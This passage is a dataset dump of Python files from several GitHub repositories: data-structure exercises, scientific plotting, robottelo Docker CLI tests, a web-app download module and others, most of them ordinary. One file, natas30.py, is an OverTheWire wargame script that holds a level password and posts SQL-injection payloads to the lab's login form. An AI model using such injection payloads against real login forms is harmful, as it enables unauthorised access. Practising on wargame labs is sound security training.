repo_name
stringlengths 5
104
| path
stringlengths 4
248
| content
stringlengths 102
99.9k
|
|---|---|---|
jonobrien/School_Backups
|
cs1-python/Labs/week 9/kebab_spot.py
|
"""
Description: A module that represents "spots" on the skewer.
Author: Sean Strout
Author: James Heliotis
Author: Jon O'Brien
"""
import food
class NoneNode:
    """Sentinel type marking the end of the skewer (no node present)."""
    __slots__ = ()

# Shared sentinel instance; spots compare against this to detect the end.
NONE_NODE = NoneNode()
class KebabSpot(object):
    """
    This class is used to represent an individual
    spot on the shish kebab skewer. Each spot contains
    1. item - a food item.
    2. succ - a reference to the next KebabSpot (or NoneNode).
    In computer science terms, a KebabSpot acts like a node in a stack.
    """
    __slots__ = (
        'item',  # The food item (of type Food)
        'succ'   # The next KebabSpot on the skewer (or the NONE_NODE sentinel)
    )
def mkKebabSpot(item, succ):
    """
    Factory that builds a KebabSpot node.

    Arguments:
        item - the item (type Food) to store at this spot
        succ - the next KebabSpot on the skewer (or NONE_NODE)
    Returns: a freshly constructed KebabSpot
    """
    spot = KebabSpot()
    spot.item = item
    spot.succ = succ
    return spot
def calories(kebabSpot):
    """
    Total the calories of every food item from kebabSpot to the end
    of the skewer.

    Arguments:
        kebabSpot - the first KebabSpot of the chain (or NONE_NODE)
    Returns: the calorie sum (int), looked up per item in food.CALORIES
    """
    total = 0
    node = kebabSpot
    while node != NONE_NODE:
        total += int(food.CALORIES[node.item.name])
        node = node.succ
    return total
def size(kebabSpot):
    """
    Count the number of KebabSpots on the skewer starting
    at this one and going to the end.

    Idea: asking the first KebabSpot for its size yields the total
    number of KebabSpots (and therefore food items).

    Arguments:
        kebabSpot - the KebabSpot instance
    Returns: The number of KebabSpots starting at this one.
    """
    # Iterative walk instead of recursion; same count either way.
    count = 0
    node = kebabSpot
    while node != NONE_NODE:
        count += 1
        node = node.succ
    return count
def isVeggie(kebabSpot):
    """
    Return whether there are only vegetable foods from this
    KebabSpot to the end of the skewer.

    Arguments:
        kebabSpot - the KebabSpot instance
    Returns: True when every item from this spot onward is a
        vegetable, False otherwise.
    """
    node = kebabSpot
    while node != NONE_NODE:
        # Mirrors the original identity test: anything other than the
        # literal True counts as non-veggie.
        if node.item.veggie is not True:
            return False
        node = node.succ
    return True
def has(kebabSpot, name):
    """
    Return whether there are any foods of the given kind
    from this KebabSpot to the end of the skewer.

    Arguments:
        kebabSpot - the KebabSpot instance
        name - the name (string) being searched for.
    Returns: True if any of the spots hold a food
        item that equals the name, False otherwise.
    """
    # The original mixed a while-loop with recursion: both branches of the
    # loop body returned on the first pass, so the loop never iterated.
    # A plain traversal expresses the same search clearly.
    node = kebabSpot
    while node != NONE_NODE:
        if str(node.item.name) == str(name):
            return True
        node = node.succ
    return False
def stringEm(kebabSpot):
    """
    Return a string listing the names of the items from this spot
    down to the end of the skewer, separated by ', '.

    Arguments:
        kebabSpot - the KebabSpot instance
    Returns: A string containing the names of each of the food
        items from this spot down ('' for an empty skewer).
    """
    names = []
    node = kebabSpot
    while not isinstance(node, NoneNode):
        names.append(str(node.item.name))
        node = node.succ
    # join() yields '' for zero items and no trailing separator otherwise,
    # matching the recursive original exactly.
    return ', '.join(names)
def emptyKebab(kebabSpot):
    """Return True when kebabSpot is the NONE_NODE sentinel (empty skewer)."""
    # The if/else returning boolean literals collapses to the comparison itself.
    return kebabSpot == NONE_NODE
|
lcy2/otwPython
|
natas30/natas30.py
|
import requests

# OverTheWire natas30: HTTP basic-auth credentials for the level.
user_auth = ('natas30', 'wie9iexae0Daihohv8vuu3cei9wahf0e')
target = 'http://natas30.natas.labs.overthewire.org/index.pl'
# SQL-injection payloads probing the Perl login form; payload3 is the one sent.
payload = 'username=natas31&password=2&password=1\' OR 1=1&password=2'
payload2 = 'username=natas31&password=1'
payload3 = "username='natas31' OR '1'='1'&username=3&password='1'"
header = {'Content-Type': 'application/x-www-form-urlencoded'}
response = requests.post(target, auth=user_auth, headers=header, data=payload3.replace(" ", "%20"))
# Bug fix: `print response.text` is Python 2 statement syntax and raises a
# SyntaxError on Python 3; use the print() function instead.
print(response.text)
|
tuergeist/HackerRank
|
challenges/sock_merchant.py
|
# URL
# https://www.hackerrank.com/challenges/sock-merchant
import unittest
def main():
    """Read sock counts from stdin and print the number of matching pairs."""
    print(sock_pairs(readFromStdin()))
def readFromStdin():
    """Consume the count line, then parse the space-separated sock colors."""
    int(input().strip())  # first line: declared number of socks (validated, unused)
    return list(map(int, input().strip().split(' ')))
def sock_pairs(data):
    """
    Count how many complete pairs of matching socks are in `data`.

    Arguments:
        data - iterable of sock colors (hashable values)
    Returns: total number of pairs (int)
    """
    from collections import Counter  # stdlib; local import keeps the module header untouched

    # Each color contributes floor(count / 2) pairs; Counter replaces the
    # original's hand-rolled 0/1 toggle dictionary.
    return sum(count // 2 for count in Counter(data).values())
if __name__ == "__main__":
    # Swap the two lines below to run the unit tests instead of stdin mode.
    # unittest.main()
    main()
class Test(unittest.TestCase):
    """Unit tests for sock_pairs."""

    def testABC(self):
        socks = [10, 20, 20, 10, 10, 30, 50, 10, 20]
        self.assertEqual(3, sock_pairs(socks))
|
DIRACGrid/DIRAC
|
tests/Performance/MySQLJobMonitoring/test_scripts/query.py
|
"""
Performance test created using multi-mechnize to analyze time
for query processing with MySQL.
"""
import random
import time
from DIRAC.WorkloadManagementSystem.DB.JobDB import JobDB
class Transaction(object):
    """multi-mechanize transaction: times a burst of random job-parameter queries."""

    def __init__(self):
        self.JobDB = JobDB()
        self.custom_timers = {}

    def run(self):
        """Query parameters for 1000-3000 random job IDs, recording elapsed time."""
        started = time.time()
        burst = random.randint(1000, 3000)
        for _ in range(burst):
            self.JobDB.getJobParameters(random.randint(1, 1000))
        # multi-mechanize reads per-transaction timings from custom_timers.
        self.custom_timers["Execution_Time"] = time.time() - started
if __name__ == "__main__":
    # Standalone smoke run: execute one transaction and dump its timers.
    trans = Transaction()
    trans.run()
    print(trans.custom_timers)
|
andreymal/mini_fiction
|
mini_fiction/downloads/base.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import zipfile
from flask import url_for, render_template
from mini_fiction.utils import misc
class BaseDownloadFormat(object):
    """Abstract story download format: content-type metadata plus URL and
    filename helpers. Subclasses must set `extension` and `name` and
    implement `render`.
    """

    extension = None
    name = None
    content_type = 'application/octet-stream'
    debug_content_type = 'text/plain; charset=utf-8'
    chapter_template = None
    chapter_extension = None

    def __init__(self, slugify_filenames=False):
        assert self.extension is not None
        assert self.name is not None
        self.slugify_filenames = bool(slugify_filenames)

    def url(self, story):
        """Absolute download URL for `story` in this format."""
        return url_for('story.download', story_id=story.id, filename=self.filename(story))

    def filename(self, story):
        """Build `<title>.<extension>`, slugified or sanitized per settings."""
        raw = (story.title or str(story.id)).strip().replace('.', '')
        if self.slugify_filenames:
            safe = slugify(raw)
        else:
            safe = misc.sanitize_filename(raw, strip=True)
        return '{}.{}'.format(safe, self.extension)

    def render(self, **kw):
        """Produce the downloadable payload; implemented by subclasses."""
        raise NotImplementedError

    @property
    def slug(self):
        """URL-safe identifier derived from the format name."""
        return slugify(str(self.name.lower()))
class ZipFileDownloadFormat(BaseDownloadFormat):
    """ZIP-archive download format: renders each published chapter through
    ``chapter_template`` and packs the results into one ZIP file.
    """

    content_type = 'application/zip'
    chapter_encoding = 'utf-8'

    def render(self, **kw):
        """Return the complete ZIP archive as bytes."""
        from io import BytesIO
        buf = BytesIO()
        zipobj = zipfile.ZipFile(buf, mode='w', compression=zipfile.ZIP_DEFLATED)
        try:
            self.render_zip_contents(zipobj, **kw)
        finally:
            # Close even on failure so ZipFile flushes its central directory.
            zipobj.close()
        return buf.getvalue()

    def render_zip_contents(self, zipobj, story, **kw):
        """Write one rendered file per published chapter of `story` into `zipobj`."""
        from mini_fiction.models import Chapter
        dirname = slugify(story.title or str(story.id))
        ext = self.chapter_extension
        # NOTE(review): Pony ORM introspects this lambda; the query expression
        # must stay in exactly this form.
        chapters = list(story.chapters.select(lambda x: not x.draft).order_by(Chapter.order, Chapter.id))
        # Zero-pad chapter numbers so archive entries sort in reading order.
        num_width = len(str(max(x.order for x in chapters))) if chapters else 1
        for chapter in chapters:
            data = render_template(
                self.chapter_template,
                chapter=chapter,
                story=story,
            ).encode(self.chapter_encoding)
            name = slugify(chapter.autotitle)
            num = str(chapter.order).rjust(num_width, '0')
            arcname = str('%s/%s_%s.%s' % (dirname, num, name, ext))
            # Stamp each entry with the chapter's latest relevant timestamp.
            zipdate = chapter.updated
            if chapter.first_published_at and chapter.first_published_at > zipdate:
                zipdate = chapter.first_published_at
            zipinfo = zipfile.ZipInfo(
                arcname,
                date_time=zipdate.timetuple()[:6],
            )
            zipinfo.compress_type = zipfile.ZIP_DEFLATED
            zipinfo.external_attr = 0o644 << 16  # Python 3.4 gives archive members 000 permissions; fix that
            zipobj.writestr(zipinfo, data)
def slugify(s):
    """Transliterate `s` to ASCII and collapse non-word character runs to '_'."""
    from mini_fiction.utils.unidecode import unidecode
    # re.sub returns just the string, so the re.subn(...)[0] dance is unnecessary.
    return re.sub(r'\W+', '_', unidecode(s))
|
rplevka/robottelo
|
pytest_plugins/markers.py
|
# Custom markers for robottelo tests
def pytest_configure(config):
    """Register custom markers to avoid warnings."""
    core_markers = [
        "deselect(reason=None): Mark test to be removed from collection.",
        "skip_if_open(issue): Skip test based on issue status.",
        "tier1: Tier 1 tests",  # CRUD tests
        "tier2: Tier 2 tests",  # Association tests
        "tier3: Tier 3 tests",  # Systems integration tests
        "tier4: Tier 4 tests",  # Long running tests
        "destructive: Destructive tests",
        "upgrade: Upgrade tests",
        "pit_server: PIT server scenario tests",
        "pit_client: PIT client scenario tests",
        "run_in_one_thread: Sequential tests",
        "build_sanity: Fast, basic tests that confirm build is ready for full test suite",
    ]
    # Combine the core markers with the per-module ones and register them all.
    for marker in core_markers + module_markers():
        config.addinivalue_line("markers", marker)
def module_markers():
    """Custom markers registered for individual CLI test modules."""
    module_marks = (
        "host_create: Marks host creation CLI tests",
        "host_update: Marks host update CLI tests",
        "host_parameter: Marks host parameter CLI tests",
        "katello_host_tools: Marks host CLI tests where katello host tools is installed on client",
        "host_subscription: Marks host subscription CLI tests",
    )
    return list(module_marks)
|
octoalmawaukh/math-waffle
|
work in progress/## 60 list of probability distributions/imgsrc/pdf_cauchy.py
|
import numpy as np
import scipy.special as sps
import matplotlib.pyplot as plt
from pylab import rcParams
def make_beta(zer, gam):
    """Return the Cauchy pdf with location `zer` and scale `gam`:

        f(x) = 1 / (pi * gam * (1 + ((x - zer) / gam)**2))
    """
    # Bug fix: the original evaluated `x - zer / gam`, dividing only the
    # location by the scale. The whole offset (x - zer) must be scaled,
    # otherwise the curve is mis-centered whenever zer != 0 or gam != 1.
    return lambda x: 1.0 / (np.pi * gam * (1 + ((x - zer) / gam) ** 2))
def main():
    """Plot four Cauchy pdf variants over [-5, 5] and save the figure to foo.pdf."""
    rcParams['figure.figsize'] = 8, 6
    # figure(num=None, facecolor='w', edgecolor='k')
    ax = plt.figure().add_subplot(1,1,1)
    x = np.arange(-5, 5, 0.01)
    # Per-curve parameters passed to make_beta: mus are the first argument
    # (location), bet the second (scale); c gives the line colors.
    mus = [0.0, 0.0, 0.0, -2.0]
    bet = [0.5, 2.0, 1.0, 1.0]
    c = ['b','r','y','g']
    for para, parb, color in zip(mus, bet, c):
        beta = make_beta(para, parb)(x)
        ax.plot(x, beta, color, linewidth=3)
    ax.grid(True)
    plt.xlim(-5, 5)
    plt.ylim(0, 0.7)
    # plt.legend(['0.2', '1.0', '5.0', '0.5'], loc='best',prop={'size':20})
    plt.savefig('foo.pdf', bbox_inches='tight')

if __name__ == '__main__':
    main()
|
Bone-Imaging-ToolKit/BItk
|
bitk/core/rescale.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# title : rescale.py
# description : Normalize data into a defined range/type
# copyright : (c) 2017 I3MTO laboratory. All Rights Reserved
# author(s) : Thomas Janvier
# creation : 01 December 2017
# modification : 17 December 2017
#
# TODO:
# - based on numpy min and max, might speed it up...
import numpy as np
from numba import vectorize
__all__ = ['rescale']
def rescale(data, clip=(0.0, 1.0), cast='float64'):
    """Rescale numerical `data` inside the `clip` range and cast as `cast`.

    Parameters
    ----------
    data : array_like
        Input data.
    clip : (scalar, scalar), int or float, optional
        [lower, upper] desired boundaries
    cast : str or numpy dtype, optional
        Output dtype; a falsy value keeps the input dtype.

    Returns
    -------
    data : numpy.ndarray
        rescaled data, cast to `cast`

    Notes
    -----
    If boundaries 'lower' > 'upper' then the signal is inverted.

    Examples
    --------
    Rescale [0, 1] random floats to [0, 255] integers:

    >>> import numpy
    >>> x = numpy.random.rand(9)
    >>> out = rescale(x, (0, 255), 'uint8')
    """
    # lazy numpy.ndarray cast
    data = np.asarray(data)
    # if no conversion asked, keep the original type
    if not cast:
        cast = data.dtype
    # Bug fix: ndarray.astype returns a NEW array -- the original discarded
    # the result, so integer inputs suffered truncating integer arithmetic.
    data = data.astype('float64')
    # parse the desired boundaries as float
    lb = float(clip[0])
    ub = float(clip[1])
    # extract the array min/max values
    lv = np.min(data)
    uv = np.max(data)
    # NOTE(review): a constant input (uv == lv) divides by zero, exactly as
    # in the original -- confirm intended handling before changing it.
    # Bug fix: apply the requested cast as documented; the original computed
    # `cast` but never used it (the cast call was commented out).
    return ((data - lv) * (ub - lb) / (uv - lv) + lb).astype(cast)
@vectorize(cache=True, nopython=True)
def _rescale(data, lv, uv, lb, ub):
    """Vectorized rescale function.

    Linearly maps `data` from the value range [lv, uv] onto the
    boundary range [lb, ub], element-wise (numba-compiled ufunc).

    Parameters
    ----------
    data : array_like
        Input data.
    lv : int or float
        lower value in data
    uv : int or float
        upper value in data
    lb : int or float
        lower boundary to fit
    ub : int or float
        upper boundary to fit

    Returns
    -------
    data : array_like
        rescaled (casted) data

    Notes
    -----
    Currently unused: the call site in ``rescale`` is commented out.
    """
    return (data - lv) * (ub - lb) / (uv - lv) + lb
|
ocelot-collab/ocelot
|
demos/sr/coherent_rad.py
|
__author__ = 'Sergey Tomin'
import sys
import matplotlib
from ocelot.rad import *
from ocelot.gui import *
from ocelot import *
from ocelot.rad.radiation_py import *
from ocelot.rad.undulator_params import *
import copy
# Longitudinal bunch parameters; the /2.36 factor converts FWHM to sigma.
sigma_tau = 100e-6/2.36
tau_p_cor = 0.013/2.36
# Three macro-particles placed at -1/0/+1 sigma along the bunch.
tau = np.array([-1, 0, 1])*sigma_tau
phi = tau/1.45859E-04*360
font = {'size' : 14}
matplotlib.rc('font', **font)
p_array_init = ParticleArray(n=3)
p_array_init.tau()[:] = np.array([-1, 0, 1])*sigma_tau
# Correlated energy offset along the bunch (linear chirp).
p_array_init.p()[:] = tau_p_cor*tau/sigma_tau
p_array_init.E = 0.6  # beam energy; presumably GeV -- confirm against ocelot docs
p_array_init.q_array[:] = 1e-10
p_array = copy.deepcopy(p_array_init)
# Observation screen 1 km downstream: 2000 x-pixels, one y-pixel,
# single photon energy at 8.5 meV-scale units (start == only energy used).
screen = Screen()
screen.z = 1000.0
screen.size_x = 15
screen.size_y = 15
screen.nx = 2000
screen.ny = 1
screen.start_energy = 0.00850
screen.end_energy = 15e-3
screen.num_energy = 1
screen.update()
# Single 9-period undulator; compute coherent radiation onto the screen.
und = Undulator(lperiod=0.4, nperiods=9, Kx=44.821)
lat = MagneticLattice((und,))
screen = coherent_radiation(lat, screen, p_array, accuracy=2, end_poles=False)
show_flux(screen)
plt.show()
|
jyejare/robottelo
|
tests/foreman/cli/test_docker.py
|
"""Tests for the Docker feature.
:Requirement: Docker
:CaseAutomation: Automated
:CaseLevel: Component
:TestType: Functional
:CaseImportance: High
:Upstream: No
"""
from random import choice
from random import randint
import pytest
from fauxfactory import gen_string
from fauxfactory import gen_url
from wait_for import wait_for
from robottelo import ssh
from robottelo.cli.activationkey import ActivationKey
from robottelo.cli.base import CLIReturnCodeError
from robottelo.cli.contentview import ContentView
from robottelo.cli.docker import Docker
from robottelo.cli.factory import make_activation_key
from robottelo.cli.factory import make_content_view
from robottelo.cli.factory import make_lifecycle_environment
from robottelo.cli.factory import make_product_wait
from robottelo.cli.factory import make_repository
from robottelo.cli.lifecycleenvironment import LifecycleEnvironment
from robottelo.cli.product import Product
from robottelo.cli.repository import Repository
from robottelo.config import settings
from robottelo.constants import CONTAINER_REGISTRY_HUB
from robottelo.constants import CONTAINER_RH_REGISTRY_UPSTREAM_NAME
from robottelo.constants import CONTAINER_UPSTREAM_NAME
from robottelo.constants import REPO_TYPE
from robottelo.datafactory import invalid_docker_upstream_names
from robottelo.datafactory import parametrized
from robottelo.datafactory import valid_docker_repository_names
from robottelo.datafactory import valid_docker_upstream_names
from robottelo.logging import logger
def _repo(product_id, name=None, upstream_name=None, url=None):
    """Creates a Docker-based repository.

    :param product_id: ID of the ``Product``.
    :param str name: Name for the repository. If ``None`` then a random
        value will be generated.
    :param str upstream_name: A valid name of an existing upstream repository.
        If ``None`` then defaults to CONTAINER_UPSTREAM_NAME constant.
    :param str url: URL of repository. If ``None`` then defaults to
        CONTAINER_REGISTRY_HUB constant.
    :return: A ``Repository`` object.
    """
    options = {
        'content-type': REPO_TYPE['docker'],
        'docker-upstream-name': upstream_name or CONTAINER_UPSTREAM_NAME,
        'name': name or gen_string('alpha', 5),
        'product-id': product_id,
        'url': url or CONTAINER_REGISTRY_HUB,
    }
    return make_repository(options)
def _content_view(repo_id, org_id):
    """Create a content view and link it to the given repository."""
    cv_id = make_content_view({'composite': False, 'organization-id': org_id})['id']
    ContentView.add_repository({'id': cv_id, 'repository-id': repo_id})
    return ContentView.info({'id': cv_id})
@pytest.fixture
def docker_host(rhel7_contenthost):
    """Instantiate and set up a docker host VM. Destroy VM when done."""
    logger.info('Installing katello-ca on the external docker host')
    rhel7_contenthost.install_katello_ca()
    # RHEL7 repos required to pull docker and its dependencies.
    repos = {
        'server': settings.repos.rhel7_os,
        'optional': settings.repos.rhel7_optional,
        'extras': settings.repos.rhel7_extras,
    }
    rhel7_contenthost.create_custom_repos(**repos)
    rhel7_contenthost.execute('yum -y install docker')
    rhel7_contenthost.execute('systemctl start docker')
    return rhel7_contenthost
@pytest.fixture
def repo(module_product):
    # A fresh Docker-type repository inside the module-scoped product.
    return _repo(module_product.id)
@pytest.fixture
def content_view(module_org, repo):
    # A non-composite content view containing the ``repo`` fixture's repository.
    return _content_view(repo['id'], module_org.id)
@pytest.fixture
def content_view_publish(content_view):
    """Publish the content view and return info on its first version."""
    ContentView.publish({'id': content_view['id']})
    published = ContentView.info({'id': content_view['id']})
    first_version = published['versions'][0]
    return ContentView.version_info({'id': first_version['id']})
@pytest.fixture
def content_view_promote(content_view_publish, module_lce):
    """Promote the published content view version into module_lce."""
    promote_options = {
        'id': content_view_publish['id'],
        'to-lifecycle-environment-id': module_lce.id,
    }
    ContentView.version_promote(promote_options)
    return ContentView.version_info({'id': content_view_publish['id']})
class TestDockerManifest:
    """Tests related to docker manifest command

    :CaseComponent: Repositories

    :Assignee: chiggins
    """

    @pytest.mark.tier2
    def test_positive_read_docker_tags(self, repo):
        """docker manifest displays tags information for a docker manifest

        :id: 59b605b5-ac2d-46e3-a85e-a259e78a07a8

        :expectedresults: docker manifest displays tags info for a docker
            manifest

        :CaseImportance: Medium

        :BZ: 1658274
        """
        Repository.synchronize({'id': repo['id']})
        # Some manifests carry no tags; keep only the tagged ones since the
        # test checks tag information.
        all_manifests = Docker.manifest.list({'repository-id': repo['id']})
        tagged_manifests = [m for m in all_manifests if m['tags'] != '']
        assert tagged_manifests
        # Tag names known to the repository, from the docker tag listing.
        repo_tag_names = {tag['tag'] for tag in Docker.tag.list({'repository-id': repo['id']})}
        for manifest in tagged_manifests:
            info = Docker.manifest.info({'id': manifest['id']})
            # Every tag on the manifest must be listed for the repository.
            for tag in info['tags']:
                assert tag['name'] in repo_tag_names
class TestDockerRepository:
    """Tests specific to performing CRUD methods against ``Docker`` repositories.

    :CaseComponent: Repositories

    :Assignee: chiggins
    """

    @pytest.mark.tier1
    @pytest.mark.parametrize('name', **parametrized(valid_docker_repository_names()))
    def test_positive_create_with_name(self, module_org, module_product, name):
        """Create one Docker-type repository

        :id: e82a36c8-3265-4c10-bafe-c7e07db3be78

        :parametrized: yes

        :expectedresults: A repository is created with a Docker upstream
            repository.

        :CaseImportance: Critical
        """
        repo = _repo(module_product.id, name)
        assert repo['name'] == name
        assert repo['upstream-repository-name'] == CONTAINER_UPSTREAM_NAME
        assert repo['content-type'] == REPO_TYPE['docker']

    @pytest.mark.tier2
    def test_positive_create_repos_using_same_product(self, module_org, module_product):
        """Create multiple Docker-type repositories

        :id: 6dd25cf4-f8b6-4958-976a-c116daf27b44

        :expectedresults: Multiple docker repositories are created with a
            Docker upstream repository and they all belong to the same product.

        :CaseLevel: Integration
        """
        repo_names = set()
        for _ in range(randint(2, 5)):
            repo = _repo(module_product.id)
            repo_names.add(repo['name'])
        product = Product.info({'id': module_product.id, 'organization-id': module_org.id})
        # All created repos must show up in the product's content listing.
        assert repo_names.issubset({repo_['repo-name'] for repo_ in product['content']})

    @pytest.mark.tier2
    def test_positive_create_repos_using_multiple_products(self, module_org):
        """Create multiple Docker-type repositories on multiple
        products.

        :id: 43f4ab0d-731e-444e-9014-d663ff945f36

        :expectedresults: Multiple docker repositories are created with a
            Docker upstream repository and they all belong to their respective
            products.

        :CaseLevel: Integration
        """
        for _ in range(randint(2, 5)):
            product = make_product_wait({'organization-id': module_org.id})
            repo_names = set()
            for _ in range(randint(2, 3)):
                repo = _repo(product['id'])
                repo_names.add(repo['name'])
            product = Product.info({'id': product['id'], 'organization-id': module_org.id})
            # Each product must contain exactly the repos created for it.
            assert repo_names == {repo_['repo-name'] for repo_ in product['content']}

    @pytest.mark.tier1
    def test_positive_sync(self, repo):
        """Create and sync a Docker-type repository

        :id: bff1d40e-181b-48b2-8141-8c86e0db62a2

        :expectedresults: A repository is created with a Docker repository and
            it is synchronized.

        :CaseImportance: Critical
        """
        # No manifests before sync, at least one after.
        assert int(repo['content-counts']['container-image-manifests']) == 0
        Repository.synchronize({'id': repo['id']})
        repo = Repository.info({'id': repo['id']})
        assert int(repo['content-counts']['container-image-manifests']) > 0

    @pytest.mark.tier1
    @pytest.mark.parametrize('new_name', **parametrized(valid_docker_repository_names()))
    def test_positive_update_name(self, repo, new_name):
        """Create a Docker-type repository and update its name.

        :id: 8b3a8496-e9bd-44f1-916f-6763a76b9b1b

        :parametrized: yes

        :expectedresults: A repository is created with a Docker upstream
            repository and that its name can be updated.

        :CaseImportance: Critical
        """
        Repository.update({'id': repo['id'], 'new-name': new_name, 'url': repo['url']})
        repo = Repository.info({'id': repo['id']})
        assert repo['name'] == new_name

    @pytest.mark.tier1
    @pytest.mark.parametrize('new_upstream_name', **parametrized(valid_docker_upstream_names()))
    def test_positive_update_upstream_name(self, repo, new_upstream_name):
        """Create a Docker-type repository and update its upstream name.

        :id: 1a6985ed-43ec-4ea6-ba27-e3870457ac56

        :parametrized: yes

        :expectedresults: A repository is created with a Docker upstream
            repository and that its upstream name can be updated.

        :CaseImportance: Critical
        """
        Repository.update(
            {
                'docker-upstream-name': new_upstream_name,
                'id': repo['id'],
                'url': repo['url'],
            }
        )
        repo = Repository.info({'id': repo['id']})
        assert repo['upstream-repository-name'] == new_upstream_name

    @pytest.mark.tier1
    @pytest.mark.parametrize('new_upstream_name', **parametrized(invalid_docker_upstream_names()))
    def test_negative_update_upstream_name(self, repo, new_upstream_name):
        """Attempt to update upstream name for a Docker-type repository.

        :id: 798651af-28b2-4907-b3a7-7c560bf66c7c

        :parametrized: yes

        :expectedresults: A repository is created with a Docker upstream
            repository and that its upstream name can not be updated with
            invalid values.

        :CaseImportance: Critical
        """
        # Invalid upstream names must be rejected by server-side validation.
        with pytest.raises(CLIReturnCodeError, match='Validation failed: Docker upstream name'):
            Repository.update(
                {
                    'docker-upstream-name': new_upstream_name,
                    'id': repo['id'],
                    'url': repo['url'],
                }
            )

    @pytest.mark.skip_if_not_set('docker')
    @pytest.mark.tier1
    def test_positive_create_with_long_upstream_name(self, module_product):
        """Create a docker repository with upstream name longer than 30
        characters

        :id: 4fe47c02-a8bd-4630-9102-189a9d268b83

        :customerscenario: true

        :BZ: 1424689

        :expectedresults: docker repository is successfully created

        :CaseImportance: Critical
        """
        repo = _repo(
            module_product.id,
            upstream_name=CONTAINER_RH_REGISTRY_UPSTREAM_NAME,
            url=settings.docker.external_registry_1,
        )
        assert repo['upstream-repository-name'] == CONTAINER_RH_REGISTRY_UPSTREAM_NAME

    @pytest.mark.skip_if_not_set('docker')
    @pytest.mark.tier1
    def test_positive_update_with_long_upstream_name(self, repo):
        """Create a docker repository and update its upstream name with longer
        than 30 characters value

        :id: 97260cce-9677-4a3e-942b-e95e2714500a

        :BZ: 1424689

        :expectedresults: docker repository is successfully updated

        :CaseImportance: Critical
        """
        Repository.update(
            {
                'docker-upstream-name': CONTAINER_RH_REGISTRY_UPSTREAM_NAME,
                'id': repo['id'],
                'url': settings.docker.external_registry_1,
            }
        )
        repo = Repository.info({'id': repo['id']})
        assert repo['upstream-repository-name'] == CONTAINER_RH_REGISTRY_UPSTREAM_NAME

    @pytest.mark.tier2
    def test_positive_update_url(self, repo):
        """Create a Docker-type repository and update its URL.

        :id: 73caacd4-7f17-42a7-8d93-3dee8b9341fa

        :expectedresults: A repository is created with a Docker upstream
            repository and that its URL can be updated.
        """
        new_url = gen_url()
        Repository.update({'id': repo['id'], 'url': new_url})
        repo = Repository.info({'id': repo['id']})
        assert repo['url'] == new_url

    @pytest.mark.tier1
    def test_positive_delete_by_id(self, repo):
        """Create and delete a Docker-type repository

        :id: ab1e8228-92a8-45dc-a863-7181711f2745

        :expectedresults: A repository with a upstream repository is created
            and then deleted.

        :CaseImportance: Critical
        """
        Repository.delete({'id': repo['id']})
        # Reading a deleted repository must fail.
        with pytest.raises(CLIReturnCodeError):
            Repository.info({'id': repo['id']})

    @pytest.mark.tier2
    def test_positive_delete_random_repo_by_id(self, module_org):
        """Create Docker-type repositories on multiple products and
        delete a random repository from a random product.

        :id: d4db5eaa-7379-4788-9b72-76f2589d8f20

        :expectedresults: Random repository can be deleted from random product
            without altering the other products.
        """
        products = [
            make_product_wait({'organization-id': module_org.id}) for _ in range(randint(2, 5))
        ]
        repos = []
        for product in products:
            for _ in range(randint(2, 3)):
                repos.append(_repo(product['id']))
        # Select random repository and delete it
        repo = choice(repos)
        repos.remove(repo)
        Repository.delete({'id': repo['id']})
        with pytest.raises(CLIReturnCodeError):
            Repository.info({'id': repo['id']})
        # Verify other repositories were not touched
        product_ids = [product['id'] for product in products]
        for repo in repos:
            result = Repository.info({'id': repo['id']})
            assert result['product']['id'] in product_ids
class TestDockerContentView:
"""Tests specific to using ``Docker`` repositories with Content Views.
:CaseComponent: ContentViews
:Assignee: ltran
:CaseLevel: Integration
"""
@pytest.mark.tier2
def test_positive_add_docker_repo_by_id(self, module_org, repo):
    """Add one Docker-type repository to a non-composite content view

    :id: 87d6c7bb-92f8-4a32-8ad2-2a1af896500b

    :expectedresults: A repository is created with a Docker repository and
        the product is added to a non-composite content view
    """
    content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
    ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
    content_view = ContentView.info({'id': content_view['id']})
    # The repo must appear among the CV's container image repositories.
    assert repo['id'] in [repo_['id'] for repo_ in content_view['container-image-repositories']]
@pytest.mark.tier2
def test_positive_add_docker_repos_by_id(self, module_org, module_product):
    """Add multiple Docker-type repositories to a non-composite CV.

    :id: 2eb19e28-a633-4c21-9469-75a686c83b34

    :expectedresults: Repositories are created with Docker upstream
        repositories and the product is added to a non-composite content
        view.
    """
    repos = [_repo(module_product.id) for _ in range(randint(2, 5))]
    content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
    for repo in repos:
        ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
    content_view = ContentView.info({'id': content_view['id']})
    # The CV must reference exactly the repos that were added.
    assert {repo['id'] for repo in repos} == {
        repo['id'] for repo in content_view['container-image-repositories']
    }
@pytest.mark.tier2
def test_positive_add_synced_docker_repo_by_id(self, module_org, repo):
    """Create and sync a Docker-type repository

    :id: 6f51d268-ed23-48ab-9dea-cd3571daa647

    :expectedresults: A repository is created with a Docker repository and
        it is synchronized.
    """
    Repository.synchronize({'id': repo['id']})
    repo = Repository.info({'id': repo['id']})
    # Sync must have pulled at least one manifest before adding to the CV.
    assert int(repo['content-counts']['container-image-manifests']) > 0
    content_view = make_content_view({'composite': False, 'organization-id': module_org.id})
    ContentView.add_repository({'id': content_view['id'], 'repository-id': repo['id']})
    content_view = ContentView.info({'id': content_view['id']})
    assert repo['id'] in [repo_['id'] for repo_ in content_view['container-image-repositories']]
@pytest.mark.tier2
def test_positive_add_docker_repo_by_id_to_ccv(self, module_org, content_view):
    """Add one Docker-type repository to a composite content view

    :id: 8e2ef5ba-3cdf-4ef9-a22a-f1701e20a5d5

    :expectedresults: A repository is created with a Docker repository and
        the product is added to a content view which is then added to a
        composite content view.

    :BZ: 1359665
    """
    ContentView.publish({'id': content_view['id']})
    content_view = ContentView.info({'id': content_view['id']})
    assert len(content_view['versions']) == 1
    # Attach the published CV version as a component of a composite CV.
    comp_content_view = make_content_view({'composite': True, 'organization-id': module_org.id})
    ContentView.update(
        {
            'id': comp_content_view['id'],
            'component-ids': content_view['versions'][0]['id'],
        }
    )
    comp_content_view = ContentView.info({'id': comp_content_view['id']})
    assert content_view['versions'][0]['id'] in [
        component['id'] for component in comp_content_view['components']
    ]
@pytest.mark.tier2
def test_positive_add_docker_repos_by_id_to_ccv(self, module_org, module_product):
    """Add multiple Docker-type repositories to a composite content view.

